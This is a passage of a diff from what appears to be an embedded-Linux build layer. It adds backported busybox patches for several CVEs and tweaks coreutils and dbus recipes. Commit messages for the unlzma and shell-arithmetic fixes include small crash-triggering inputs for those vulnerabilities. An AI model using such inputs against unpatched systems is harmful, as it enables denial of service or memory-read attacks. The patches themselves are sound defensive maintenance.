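	if (!path || !path[0])
		path = "/tmp";

	while ((c = getopt_long(argc, argv, "p:", longopts, NULL)) != -1) {
		if (c == 'p' || (c == 'T' && optarg))
			path = optarg;   /* -p DIR or --tmpdir=DIR overrides the default */
	}

	printf("base directory: %s\n", path);
	return 0;
}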
diff --git a/meta/recipes-core/busybox/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch b/meta/recipes-core/busybox/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch
new file mode 100644
index 0000000000..2c9da33a51
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch
@@ -0,0 +1,64 @@
+From f8ad7c331b25ba90fd296b37c443b4114cb196e2 Mon Sep 17 00:00:00 2001
+From: Ariadne Conill <ariadne@dereferenced.org>
+Date: Sun, 3 Apr 2022 12:16:45 +0000
+Subject: [PATCH] nslookup: sanitize all printed strings with printable_string
+
+Otherwise, terminal sequences can be injected, which enables various terminal injection
+attacks from DNS results.
+
+MJ: One chunk wasn't applicable to the 1.31.1 version, because parsing of
+SRV records was only added in the newer 1.32.0 release with:
+ commit 6b4960155e94076bf25518e4e268a7a5f849308e
+ Author: Jo-Philipp Wich <jo@mein.io>
+ Date: Thu Jun 27 17:27:29 2019 +0200
+
+ nslookup: implement support for SRV records
+
+CVE: CVE-2022-28391
+Upstream-Status: Pending
+Signed-off-by: Ariadne Conill <ariadne@dereferenced.org>
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+---
+ networking/nslookup.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/networking/nslookup.c b/networking/nslookup.c
+index 24e09d4f0..89b9c8a13 100644
+--- a/networking/nslookup.c
++++ b/networking/nslookup.c
+@@ -404,7 +404,7 @@ static int parse_reply(const unsigned char *msg, size_t len)
+ //printf("Unable to uncompress domain: %s\n", strerror(errno));
+ return -1;
+ }
+- printf(format, ns_rr_name(rr), dname);
++ printf(format, ns_rr_name(rr), printable_string(dname));
+ break;
+
+ case ns_t_mx:
+@@ -419,7 +419,7 @@ static int parse_reply(const unsigned char *msg, size_t len)
+ //printf("Cannot uncompress MX domain: %s\n", strerror(errno));
+ return -1;
+ }
+- printf("%s\tmail exchanger = %d %s\n", ns_rr_name(rr), n, dname);
++ printf("%s\tmail exchanger = %d %s\n", ns_rr_name(rr), n, printable_string(dname));
+ break;
+
+ case ns_t_txt:
+@@ -431,7 +431,7 @@ static int parse_reply(const unsigned char *msg, size_t len)
+ if (n > 0) {
+ memset(dname, 0, sizeof(dname));
+ memcpy(dname, ns_rr_rdata(rr) + 1, n);
+- printf("%s\ttext = \"%s\"\n", ns_rr_name(rr), dname);
++ printf("%s\ttext = \"%s\"\n", ns_rr_name(rr), printable_string(dname));
+ }
+ break;
+
+@@ -461,7 +461,7 @@ static int parse_reply(const unsigned char *msg, size_t len)
+ return -1;
+ }
+
+- printf("\tmail addr = %s\n", dname);
++ printf("\tmail addr = %s\n", printable_string(dname));
+ cp += n;
+
+ printf("\tserial = %lu\n", ns_get32(cp));
diff --git a/meta/recipes-core/busybox/busybox/CVE-2021-42374.patch b/meta/recipes-core/busybox/busybox/CVE-2021-42374.patch
new file mode 100644
index 0000000000..aef8a3db85
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/CVE-2021-42374.patch
@@ -0,0 +1,53 @@
+From 04f052c56ded5ab6a904e3a264a73dc0412b2e78 Mon Sep 17 00:00:00 2001
+From: Denys Vlasenko <vda.linux@googlemail.com>
+Date: Tue, 15 Jun 2021 15:07:57 +0200
+Subject: [PATCH] unlzma: fix a case where we could read before beginning of
+ buffer
+Cc: pavel@zhukoff.net
+
+Testcase:
+
+ 21 01 01 00 00 00 00 00 e7 01 01 01 ef 00 df b6
+ 00 17 02 10 11 0f ff 00 16 00 00
+
+Unfortunately, the bug is not reliably causing a segfault,
+the behavior depends on what's in memory before the buffer.
+
+function old new delta
+unpack_lzma_stream 2762 2768 +6
+
+Signed-off-by: Denys Vlasenko <vda.linux@googlemail.com>
+
+Signed-off-by: Pavel Zhukov <pavel.zhukov@huawei.com>
+
+CVE: CVE-2021-42374
+Upstream-Status: Backport [https://git.busybox.net/busybox/commit/?h=1_33_stable&id=d326be2850ea2bd78fe2c22d6c45c3b861d82937]
+Comment: testdata dropped because of binary format
+
+---
+ archival/libarchive/decompress_unlzma.c | 5 ++++-
+ testsuite/unlzma.tests | 17 +++++++++++++----
+ testsuite/unlzma_issue_3.lzma | Bin 0 -> 27 bytes
+ 3 files changed, 17 insertions(+), 5 deletions(-)
+ create mode 100644 testsuite/unlzma_issue_3.lzma
+
+diff --git a/archival/libarchive/decompress_unlzma.c b/archival/libarchive/decompress_unlzma.c
+index 0744f231a1d64d92676b0cada2342f88f3b39b31..fb5aac8fe9ea0c53e0c2d7a7cbd05a753e39bc9d 100644
+--- a/archival/libarchive/decompress_unlzma.c
++++ b/archival/libarchive/decompress_unlzma.c
+@@ -290,8 +290,11 @@ unpack_lzma_stream(transformer_state_t *xstate)
+ uint32_t pos;
+
+ pos = buffer_pos - rep0;
+- if ((int32_t)pos < 0)
++ if ((int32_t)pos < 0) {
+ pos += header.dict_size;
++ if ((int32_t)pos < 0)
++ goto bad;
++ }
+ match_byte = buffer[pos];
+ do {
+ int bit;
+--
+2.34.0
+
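The hunk above guards an attacker-controlled back-reference distance: after wrapping the position around the dictionary once, it must still land inside the buffer, otherwise the stream is rejected. A standalone sketch of that check (hypothetical function name, not the busybox decompressor):

#include <stdint.h>

static int resolve_match_pos(uint32_t buffer_pos, uint32_t rep0,
			     uint32_t dict_size, uint32_t *match_pos)
{
	uint32_t pos = buffer_pos - rep0;   /* wraps to a huge value if rep0 > buffer_pos */

	if ((int32_t)pos < 0) {
		pos += dict_size;
		if ((int32_t)pos < 0)
			return -1;          /* distance larger than the dictionary: corrupt input */
	}
	*match_pos = pos;
	return 0;
}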
diff --git a/meta/recipes-core/busybox/busybox/CVE-2021-42376.patch b/meta/recipes-core/busybox/busybox/CVE-2021-42376.patch
new file mode 100644
index 0000000000..c913eaee9c
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/CVE-2021-42376.patch
@@ -0,0 +1,138 @@
+From 56a335378ac100d51c30b21eee499a2effa37fba Mon Sep 17 00:00:00 2001
+From: Denys Vlasenko <vda.linux@googlemail.com>
+Date: Tue, 15 Jun 2021 16:05:57 +0200
+Subject: hush: fix handling of \^C and "^C"
+
+function old new delta
+parse_stream 2238 2252 +14
+encode_string 243 256 +13
+------------------------------------------------------------------------------
+(add/remove: 0/0 grow/shrink: 2/0 up/down: 27/0) Total: 27 bytes
+
+Signed-off-by: Denys Vlasenko <vda.linux@googlemail.com>
+(cherry picked from commit 1b7a9b68d0e9aa19147d7fda16eb9a6b54156985)
+
+Signed-off-by: Pavel Zhukov <pavel.zhukov@huawei.com>
+
+CVE: CVE-2021-42376
+Upstream-Status: Backport [https://git.busybox.net/busybox/patch/?id=56a335378ac100d51c30b21eee499a2effa37fba]
+Comment: No changes in any hunk
+---
+ shell/ash_test/ash-misc/control_char3.right | 1 +
+ shell/ash_test/ash-misc/control_char3.tests | 2 ++
+ shell/ash_test/ash-misc/control_char4.right | 1 +
+ shell/ash_test/ash-misc/control_char4.tests | 2 ++
+ shell/hush.c | 11 +++++++++++
+ shell/hush_test/hush-misc/control_char3.right | 1 +
+ shell/hush_test/hush-misc/control_char3.tests | 2 ++
+ shell/hush_test/hush-misc/control_char4.right | 1 +
+ shell/hush_test/hush-misc/control_char4.tests | 2 ++
+ 9 files changed, 23 insertions(+)
+ create mode 100644 shell/ash_test/ash-misc/control_char3.right
+ create mode 100755 shell/ash_test/ash-misc/control_char3.tests
+ create mode 100644 shell/ash_test/ash-misc/control_char4.right
+ create mode 100755 shell/ash_test/ash-misc/control_char4.tests
+ create mode 100644 shell/hush_test/hush-misc/control_char3.right
+ create mode 100755 shell/hush_test/hush-misc/control_char3.tests
+ create mode 100644 shell/hush_test/hush-misc/control_char4.right
+ create mode 100755 shell/hush_test/hush-misc/control_char4.tests
+
+diff --git a/shell/ash_test/ash-misc/control_char3.right b/shell/ash_test/ash-misc/control_char3.right
+new file mode 100644
+index 000000000..283e02cbb
+--- /dev/null
++++ b/shell/ash_test/ash-misc/control_char3.right
+@@ -0,0 +1 @@
++SHELL: line 1: : not found
+diff --git a/shell/ash_test/ash-misc/control_char3.tests b/shell/ash_test/ash-misc/control_char3.tests
+new file mode 100755
+index 000000000..4359db3f3
+--- /dev/null
++++ b/shell/ash_test/ash-misc/control_char3.tests
+@@ -0,0 +1,2 @@
++# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages)
++$THIS_SH -c '\' SHELL
+diff --git a/shell/ash_test/ash-misc/control_char4.right b/shell/ash_test/ash-misc/control_char4.right
+new file mode 100644
+index 000000000..2bf18e684
+--- /dev/null
++++ b/shell/ash_test/ash-misc/control_char4.right
+@@ -0,0 +1 @@
++SHELL: line 1: -: not found
+diff --git a/shell/ash_test/ash-misc/control_char4.tests b/shell/ash_test/ash-misc/control_char4.tests
+new file mode 100755
+index 000000000..48010f154
+--- /dev/null
++++ b/shell/ash_test/ash-misc/control_char4.tests
+@@ -0,0 +1,2 @@
++# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages)
++$THIS_SH -c '"-"' SHELL
+diff --git a/shell/hush.c b/shell/hush.c
+index 9fead37da..249728b9d 100644
+--- a/shell/hush.c
++++ b/shell/hush.c
+@@ -5235,6 +5235,11 @@ static int encode_string(o_string *as_string,
+ }
+ #endif
+ o_addQchr(dest, ch);
++ if (ch == SPECIAL_VAR_SYMBOL) {
++ /* Convert "^C" to corresponding special variable reference */
++ o_addchr(dest, SPECIAL_VAR_QUOTED_SVS);
++ o_addchr(dest, SPECIAL_VAR_SYMBOL);
++ }
+ goto again;
+ #undef as_string
+ }
+@@ -5346,6 +5351,11 @@ static struct pipe *parse_stream(char **pstring,
+ if (ch == '\n')
+ continue; /* drop \<newline>, get next char */
+ nommu_addchr(&ctx.as_string, '\\');
++ if (ch == SPECIAL_VAR_SYMBOL) {
++ nommu_addchr(&ctx.as_string, ch);
++ /* Convert \^C to corresponding special variable reference */
++ goto case_SPECIAL_VAR_SYMBOL;
++ }
+ o_addchr(&ctx.word, '\\');
+ if (ch == EOF) {
+ /* Testcase: eval 'echo Ok\' */
+@@ -5670,6 +5680,7 @@ static struct pipe *parse_stream(char **pstring,
+ /* Note: nommu_addchr(&ctx.as_string, ch) is already done */
+
+ switch (ch) {
++ case_SPECIAL_VAR_SYMBOL:
+ case SPECIAL_VAR_SYMBOL:
+ /* Convert raw ^C to corresponding special variable reference */
+ o_addchr(&ctx.word, SPECIAL_VAR_SYMBOL);
+diff --git a/shell/hush_test/hush-misc/control_char3.right b/shell/hush_test/hush-misc/control_char3.right
+new file mode 100644
+index 000000000..94b4f8699
+--- /dev/null
++++ b/shell/hush_test/hush-misc/control_char3.right
+@@ -0,0 +1 @@
++hush: can't execute '': No such file or directory
+diff --git a/shell/hush_test/hush-misc/control_char3.tests b/shell/hush_test/hush-misc/control_char3.tests
+new file mode 100755
+index 000000000..4359db3f3
+--- /dev/null
++++ b/shell/hush_test/hush-misc/control_char3.tests
+@@ -0,0 +1,2 @@
++# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages)
++$THIS_SH -c '\' SHELL
+diff --git a/shell/hush_test/hush-misc/control_char4.right b/shell/hush_test/hush-misc/control_char4.right
+new file mode 100644
+index 000000000..698e21427
+--- /dev/null
++++ b/shell/hush_test/hush-misc/control_char4.right
+@@ -0,0 +1 @@
++hush: can't execute '-': No such file or directory
+diff --git a/shell/hush_test/hush-misc/control_char4.tests b/shell/hush_test/hush-misc/control_char4.tests
+new file mode 100755
+index 000000000..48010f154
+--- /dev/null
++++ b/shell/hush_test/hush-misc/control_char4.tests
+@@ -0,0 +1,2 @@
++# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages)
++$THIS_SH -c '"-"' SHELL
+--
+cgit v1.2.3
+
diff --git a/meta/recipes-core/busybox/busybox/CVE-2022-48174.patch b/meta/recipes-core/busybox/busybox/CVE-2022-48174.patch
new file mode 100644
index 0000000000..dfba2a7e0f
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/CVE-2022-48174.patch
@@ -0,0 +1,82 @@
+From c18ebf861528ef24958dd99a146482d2a40014c7 Mon Sep 17 00:00:00 2001
+From: Denys Vlasenko <vda.linux@googlemail.com>
+Date: Mon, 12 Jun 2023 17:48:47 +0200
+Subject: [PATCH] shell: avoid segfault on ${0::0/0~09J}. Closes 15216
+
+function old new delta
+evaluate_string 1011 1053 +42
+
+CVE: CVE-2022-48174
+Upstream-Status: Backport [d417193cf37ca1005830d7e16f5fa7e1d8a44209]
+Signed-off-by: Denys Vlasenko <vda.linux@googlemail.com>
+---
+ shell/math.c | 39 +++++++++++++++++++++++++++++++++++----
+ 1 file changed, 35 insertions(+), 4 deletions(-)
+
+diff --git a/shell/math.c b/shell/math.c
+index af1ab55c0..79824e81f 100644
+--- a/shell/math.c
++++ b/shell/math.c
+@@ -578,6 +578,28 @@ static arith_t strto_arith_t(const char *nptr, char **endptr)
+ # endif
+ #endif
+
++//TODO: much better estimation than expr_len/2? Such as:
++//static unsigned estimate_nums_and_names(const char *expr)
++//{
++// unsigned count = 0;
++// while (*(expr = skip_whitespace(expr)) != '\0') {
++// const char *p;
++// if (isdigit(*expr)) {
++// while (isdigit(*++expr))
++// continue;
++// count++;
++// continue;
++// }
++// p = endofname(expr);
++// if (p != expr) {
++// expr = p;
++// count++;
++// continue;
++// }
++// }
++// return count;
++//}
++
+ static arith_t FAST_FUNC
+ evaluate_string(arith_state_t *math_state, const char *expr)
+ {
+@@ -585,10 +607,12 @@ evaluate_string(arith_state_t *math_state, const char *expr)
+ const char *errmsg;
+ const char *start_expr = expr = skip_whitespace(expr);
+ unsigned expr_len = strlen(expr) + 2;
+- /* Stack of integers */
+- /* The proof that there can be no more than strlen(startbuf)/2+1
+- * integers in any given correct or incorrect expression
+- * is left as an exercise to the reader. */
++ /* Stack of integers/names */
++ /* There can be no more than strlen(startbuf)/2+1
++ * integers/names in any given correct or incorrect expression.
++ * (modulo "09v09v09v09v09v" case,
++ * but we have code to detect that early)
++ */
+ var_or_num_t *const numstack = alloca((expr_len / 2) * sizeof(numstack[0]));
+ var_or_num_t *numstackptr = numstack;
+ /* Stack of operator tokens */
+@@ -657,6 +681,13 @@ evaluate_string(arith_state_t *math_state, const char *expr)
+ numstackptr->var = NULL;
+ errno = 0;
+ numstackptr->val = strto_arith_t(expr, (char**) &expr);
++ /* A number can't be followed by another number, or a variable name.
++ * We'd catch this later anyway, but this would require numstack[]
++ * to be twice as deep to handle strings where _every_ char is
++ * a new number or name. Example: 09v09v09v09v09v09v09v09v09v
++ */
++ if (isalnum(*expr) || *expr == '_')
++ goto err;
+ if (errno)
+ numstackptr->val = 0; /* bash compat */
+ goto num;
+--
+2.40.1
+
diff --git a/meta/recipes-core/busybox/busybox_1.31.1.bb b/meta/recipes-core/busybox/busybox_1.31.1.bb
index 7563368287..94aa1467df 100644
--- a/meta/recipes-core/busybox/busybox_1.31.1.bb
+++ b/meta/recipes-core/busybox/busybox_1.31.1.bb
@@ -50,7 +50,15 @@ SRC_URI = "https://busybox.net/downloads/busybox-${PV}.tar.bz2;name=tarball \
file://0001-sysctl-ignore-EIO-of-stable_secret-below-proc-sys-ne.patch \
file://busybox-CVE-2018-1000500.patch \
file://0001-hwclock-make-glibc-2.31-compatible.patch \
-"
+ file://0001-decompress_gunzip-Fix-DoS-if-gzip-is-corrupt.patch \
+ file://0001-mktemp-add-tmpdir-option.patch \
+ file://CVE-2021-42374.patch \
+ file://CVE-2021-42376.patch \
+ file://CVE-2021-423xx-awk.patch \
+ file://CVE-2022-48174.patch \
+ file://0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch \
+ file://0002-nslookup-sanitize-all-printed-strings-with-printable.patch \
+ "
SRC_URI_append_libc-musl = " file://musl.cfg "
SRC_URI[tarball.md5sum] = "70913edaf2263a157393af07565c17f0"
diff --git a/meta/recipes-core/busybox/files/CVE-2021-423xx-awk.patch b/meta/recipes-core/busybox/files/CVE-2021-423xx-awk.patch
new file mode 100644
index 0000000000..7e3d47b88c
--- /dev/null
+++ b/meta/recipes-core/busybox/files/CVE-2021-423xx-awk.patch
@@ -0,0 +1,215 @@
+From a21708eb8d07b4a6dbc1d3e4ace4c5721515a84c Mon Sep 17 00:00:00 2001
+From: Sana Kazi <Sana.Kazi@kpit.com>
+Date: Wed, 8 Dec 2021 12:25:34 +0530
+Subject: [PATCH] busybox: Fix multiple security issues in awk
+
+Description: fix multiple security issues in awk
+Origin: backported awk.c from busybox 1.34.1
+
+CVE: CVE-2021-42378
+CVE: CVE-2021-42379
+CVE: CVE-2021-42380
+CVE: CVE-2021-42381
+CVE: CVE-2021-42382
+CVE: CVE-2021-42384
+CVE: CVE-2021-42385
+CVE: CVE-2021-42386
+
+Upstream-Status: Backport [https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/busybox/1:1.30.1-6ubuntu3.1/busybox_1.30.1-6ubuntu3.1.debian.tar.xz]
+
+Comment: Refreshed the first hunk and removed a few hunks as they are already present in the source.
+
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <Ranjitsinh.Rathod@kpit.com>
+
+---
+ editors/awk.c | 80 ++++++++++++++++++++++++++++++++++++++-------------
+ 1 file changed, 60 insertions(+), 20 deletions(-)
+
+diff --git a/editors/awk.c b/editors/awk.c
+index d25508e..4e4f282 100644
+--- a/editors/awk.c
++++ b/editors/awk.c
+@@ -272,7 +272,8 @@ typedef struct tsplitter_s {
+ /* if previous token class is CONCAT1 and next is CONCAT2, concatenation */
+ /* operator is inserted between them */
+ #define TC_CONCAT1 (TC_VARIABLE | TC_ARRTERM | TC_SEQTERM \
+- | TC_STRING | TC_NUMBER | TC_UOPPOST)
++ | TC_STRING | TC_NUMBER | TC_UOPPOST \
++ | TC_LENGTH)
+ #define TC_CONCAT2 (TC_OPERAND | TC_UOPPRE)
+
+ #define OF_RES1 0x010000
+@@ -404,7 +405,7 @@ static const char tokenlist[] ALIGN1 =
+
+ #define OC_B OC_BUILTIN
+
+-static const uint32_t tokeninfo[] = {
++static const uint32_t tokeninfo[] ALIGN4 = {
+ 0,
+ 0,
+ OC_REGEXP,
+@@ -1070,8 +1071,10 @@ static uint32_t next_token(uint32_t expected)
+ const uint32_t *ti;
+
+ if (t_rollback) {
++ debug_printf_parse("%s: using rolled-back token\n", __func__);
+ t_rollback = FALSE;
+ } else if (concat_inserted) {
++ debug_printf_parse("%s: using concat-inserted token\n", __func__);
+ concat_inserted = FALSE;
+ t_tclass = save_tclass;
+ t_info = save_info;
+@@ -1200,7 +1203,11 @@ static uint32_t next_token(uint32_t expected)
+ goto readnext;
+
+ /* insert concatenation operator when needed */
+- if ((ltclass & TC_CONCAT1) && (tc & TC_CONCAT2) && (expected & TC_BINOP)) {
++ debug_printf_parse("%s: %x %x %x concat_inserted?\n", __func__,
++ (ltclass & TC_CONCAT1), (tc & TC_CONCAT2), (expected & TC_BINOP));
++ if ((ltclass & TC_CONCAT1) && (tc & TC_CONCAT2) && (expected & TC_BINOP)
++ && !(ltclass == TC_LENGTH && tc == TC_SEQSTART) /* but not for "length(..." */
++ ) {
+ concat_inserted = TRUE;
+ save_tclass = tc;
+ save_info = t_info;
+@@ -1208,6 +1215,7 @@ static uint32_t next_token(uint32_t expected)
+ t_info = OC_CONCAT | SS | P(35);
+ }
+
++ debug_printf_parse("%s: t_tclass=tc=%x\n", __func__, t_tclass);
+ t_tclass = tc;
+ }
+ ltclass = t_tclass;
+@@ -1218,6 +1226,7 @@ static uint32_t next_token(uint32_t expected)
+ EMSG_UNEXP_EOS : EMSG_UNEXP_TOKEN);
+ }
+
++ debug_printf_parse("%s: returning, ltclass:%x t_double:%f\n", __func__, ltclass, t_double);
+ return ltclass;
+ #undef concat_inserted
+ #undef save_tclass
+@@ -1282,7 +1291,7 @@ static node *parse_expr(uint32_t iexp)
+ glptr = NULL;
+
+ } else if (tc & (TC_BINOP | TC_UOPPOST)) {
+- debug_printf_parse("%s: TC_BINOP | TC_UOPPOST\n", __func__);
++ debug_printf_parse("%s: TC_BINOP | TC_UOPPOST tc:%x\n", __func__, tc);
+ /* for binary and postfix-unary operators, jump back over
+ * previous operators with higher priority */
+ vn = cn;
+@@ -1350,8 +1359,10 @@ static node *parse_expr(uint32_t iexp)
+ v = cn->l.v = xzalloc(sizeof(var));
+ if (tc & TC_NUMBER)
+ setvar_i(v, t_double);
+- else
++ else {
+ setvar_s(v, t_string);
++ xtc &= ~TC_UOPPOST; /* "str"++ is not allowed */
++ }
+ break;
+
+ case TC_REGEXP:
+@@ -1387,7 +1398,12 @@ static node *parse_expr(uint32_t iexp)
+
+ case TC_LENGTH:
+ debug_printf_parse("%s: TC_LENGTH\n", __func__);
+- next_token(TC_SEQSTART | TC_OPTERM | TC_GRPTERM);
++ next_token(TC_SEQSTART /* length(...) */
++ | TC_OPTERM /* length; (or newline)*/
++ | TC_GRPTERM /* length } */
++ | TC_BINOPX /* length <op> NUM */
++ | TC_COMMA /* print length, 1 */
++ );
+ rollback_token();
+ if (t_tclass & TC_SEQSTART) {
+ /* It was a "(" token. Handle just like TC_BUILTIN */
+@@ -1747,12 +1763,34 @@ static void fsrealloc(int size)
+ nfields = size;
+ }
+
++static int regexec1_nonempty(const regex_t *preg, const char *s, regmatch_t pmatch[])
++{
++ int r = regexec(preg, s, 1, pmatch, 0);
++ if (r == 0 && pmatch[0].rm_eo == 0) {
++ /* For example, happens when FS can match
++ * an empty string (awk -F ' *'). Logically,
++ * this should split into one-char fields.
++ * However, gawk 5.0.1 searches for first
++ * _non-empty_ separator string match:
++ */
++ size_t ofs = 0;
++ do {
++ ofs++;
++ if (!s[ofs])
++ return REG_NOMATCH;
++ regexec(preg, s + ofs, 1, pmatch, 0);
++ } while (pmatch[0].rm_eo == 0);
++ pmatch[0].rm_so += ofs;
++ pmatch[0].rm_eo += ofs;
++ }
++ return r;
++}
++
+ static int awk_split(const char *s, node *spl, char **slist)
+ {
+- int l, n;
++ int n;
+ char c[4];
+ char *s1;
+- regmatch_t pmatch[2]; // TODO: why [2]? [1] is enough...
+
+ /* in worst case, each char would be a separate field */
+ *slist = s1 = xzalloc(strlen(s) * 2 + 3);
+@@ -1769,29 +1807,31 @@ static int awk_split(const char *s, node *spl, char **slist)
+ return n; /* "": zero fields */
+ n++; /* at least one field will be there */
+ do {
++ int l;
++ regmatch_t pmatch[2]; // TODO: why [2]? [1] is enough...
++
+ l = strcspn(s, c+2); /* len till next NUL or \n */
+- if (regexec(icase ? spl->r.ire : spl->l.re, s, 1, pmatch, 0) == 0
++ if (regexec1_nonempty(icase ? spl->r.ire : spl->l.re, s, pmatch) == 0
+ && pmatch[0].rm_so <= l
+ ) {
++ /* if (pmatch[0].rm_eo == 0) ... - impossible */
+ l = pmatch[0].rm_so;
+- if (pmatch[0].rm_eo == 0) {
+- l++;
+- pmatch[0].rm_eo++;
+- }
+ n++; /* we saw yet another delimiter */
+ } else {
+ pmatch[0].rm_eo = l;
+ if (s[l])
+ pmatch[0].rm_eo++;
+ }
+- memcpy(s1, s, l);
+- /* make sure we remove *all* of the separator chars */
+- do {
+- s1[l] = '\0';
+- } while (++l < pmatch[0].rm_eo);
+- nextword(&s1);
++ s1 = mempcpy(s1, s, l);
++ *s1++ = '\0';
+ s += pmatch[0].rm_eo;
+ } while (*s);
++
++ /* echo a-- | awk -F-- '{ print NF, length($NF), $NF }'
++ * should print "2 0 ":
++ */
++ *s1 = '\0';
++
+ return n;
+ }
+ if (c[0] == '\0') { /* null split */
+@@ -1995,7 +2035,7 @@ static int ptest(node *pattern)
+ static int awk_getline(rstream *rsm, var *v)
+ {
+ char *b;
+- regmatch_t pmatch[2];
++ regmatch_t pmatch[2]; // TODO: why [2]? [1] is enough...
+ int size, a, p, pp = 0;
+ int fd, so, eo, r, rp;
+ char c, *m, *s;
diff --git a/meta/recipes-core/coreutils/coreutils_8.31.bb b/meta/recipes-core/coreutils/coreutils_8.31.bb
index 0c8452da98..3841f71155 100644
--- a/meta/recipes-core/coreutils/coreutils_8.31.bb
+++ b/meta/recipes-core/coreutils/coreutils_8.31.bb
@@ -26,6 +26,10 @@ SRC_URI_append_libc-musl = "file://strtod_fix_clash_with_strtold.patch"
SRC_URI[md5sum] = "0009a224d8e288e8ec406ef0161f9293"
SRC_URI[sha256sum] = "ff7a9c918edce6b4f4b2725e3f9b37b0c4d193531cac49a48b56c4d0d3a9e9fd"
+# http://git.savannah.gnu.org/cgit/coreutils.git/commit/?id=v8.27-101-gf5d7c0842
+# runcon is not really a sandbox command, use `runcon ... setsid ...` to avoid this particular issue.
+CVE_CHECK_WHITELIST += "CVE-2016-2781"
+
EXTRA_OECONF_class-native = "--without-gmp"
EXTRA_OECONF_class-target = "--enable-install-program=arch,hostname --libexecdir=${libdir}"
EXTRA_OECONF_class-nativesdk = "--enable-install-program=arch,hostname"
@@ -39,11 +43,15 @@ PACKAGECONFIG_class-target ??= "\
# The lib/oe/path.py requires xattr
PACKAGECONFIG_class-native ??= "xattr"
+# oe-core builds need xattr support
+PACKAGECONFIG_class-nativesdk ??= "xattr"
+
# with, without, depends, rdepends
#
PACKAGECONFIG[acl] = "--enable-acl,--disable-acl,acl,"
PACKAGECONFIG[xattr] = "--enable-xattr,--disable-xattr,attr,"
PACKAGECONFIG[single-binary] = "--enable-single-binary,--disable-single-binary,,"
+PACKAGECONFIG[openssl] = "--with-openssl=yes,--with-openssl=no,openssl"
# [ df mktemp nice printenv base64 gets a special treatment and is not included in this
bindir_progs = "arch basename chcon cksum comm csplit cut dir dircolors dirname du \
diff --git a/meta/recipes-core/dbus-wait/dbus-wait_git.bb b/meta/recipes-core/dbus-wait/dbus-wait_git.bb
index c24295b537..b39f7523c0 100644
--- a/meta/recipes-core/dbus-wait/dbus-wait_git.bb
+++ b/meta/recipes-core/dbus-wait/dbus-wait_git.bb
@@ -1,5 +1,6 @@
SUMMARY = "A simple tool to wait for a specific signal over DBus"
HOMEPAGE = "http://git.yoctoproject.org/cgit/cgit.cgi/dbus-wait"
+DESCRIPTION = "${SUMMARY}"
SECTION = "base"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
@@ -10,7 +11,7 @@ SRCREV = "6cc6077a36fe2648a5f993fe7c16c9632f946517"
PV = "0.1+git${SRCPV}"
PR = "r2"
-SRC_URI = "git://git.yoctoproject.org/${BPN}"
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master"
UPSTREAM_CHECK_COMMITS = "1"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-core/dbus/dbus-test_1.12.16.bb b/meta/recipes-core/dbus/dbus-test_1.12.24.bb
index bea0e74ed0..755c841bad 100644
--- a/meta/recipes-core/dbus/dbus-test_1.12.16.bb
+++ b/meta/recipes-core/dbus/dbus-test_1.12.24.bb
@@ -1,57 +1,31 @@
SUMMARY = "D-Bus test package (for D-bus functionality testing only)"
HOMEPAGE = "http://dbus.freedesktop.org"
SECTION = "base"
-LICENSE = "AFL-2.1 | GPLv2+"
-LIC_FILES_CHKSUM = "file://COPYING;md5=10dded3b58148f3f1fd804b26354af3e \
- file://dbus/dbus.h;beginline=6;endline=20;md5=7755c9d7abccd5dbd25a6a974538bb3c"
-DEPENDS = "dbus glib-2.0"
+require dbus.inc
-RDEPENDS_${PN}-dev = ""
+SRC_URI += "file://run-ptest \
+ file://python-config.patch \
+ "
-SRC_URI = "http://dbus.freedesktop.org/releases/dbus/dbus-${PV}.tar.gz \
- file://tmpdir.patch \
- file://run-ptest \
- file://python-config.patch \
- file://clear-guid_from_server-if-send_negotiate_unix_f.patch \
- "
+DEPENDS = "dbus glib-2.0"
-SRC_URI[md5sum] = "2dbeae80dfc9e3632320c6a53d5e8890"
-SRC_URI[sha256sum] = "54a22d2fa42f2eb2a871f32811c6005b531b9613b1b93a0d269b05e7549fec80"
+RDEPENDS_${PN}-dev = ""
S="${WORKDIR}/dbus-${PV}"
FILESEXTRAPATHS =. "${FILE_DIRNAME}/dbus:"
-inherit autotools pkgconfig gettext ptest upstream-version-is-even
+inherit ptest
-EXTRA_OECONF_X = "${@bb.utils.contains('DISTRO_FEATURES', 'x11', '--with-x', '--without-x', d)}"
-EXTRA_OECONF_X_class-native = "--without-x"
-
-EXTRA_OECONF = "--enable-tests \
+EXTRA_OECONF += "--enable-tests \
--enable-modular-tests \
--enable-installed-tests \
--enable-checks \
--enable-asserts \
- --enable-largefile \
- --disable-xml-docs \
- --disable-doxygen-docs \
- --disable-libaudit \
--with-dbus-test-dir=${PTEST_PATH} \
- ${EXTRA_OECONF_X} \
--enable-embedded-tests \
"
-EXTRA_OECONF_append_class-target = " SYSTEMCTL=${base_bindir}/systemctl"
-
-PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'systemd x11', d)}"
-PACKAGECONFIG_class-native = ""
-PACKAGECONFIG_class-nativesdk = ""
-
-PACKAGECONFIG[systemd] = "--enable-systemd --with-systemdsystemunitdir=${systemd_system_unitdir},--disable-systemd --without-systemdsystemunitdir,systemd"
-PACKAGECONFIG[x11] = "--with-x --enable-x11-autolaunch,--without-x --disable-x11-autolaunch, virtual/libx11 libsm"
-PACKAGECONFIG[user-session] = "--enable-user-session --with-systemduserunitdir=${systemd_user_unitdir},--disable-user-session"
-PACKAGECONFIG[verbose-mode] = "--enable-verbose-mode,,,"
-
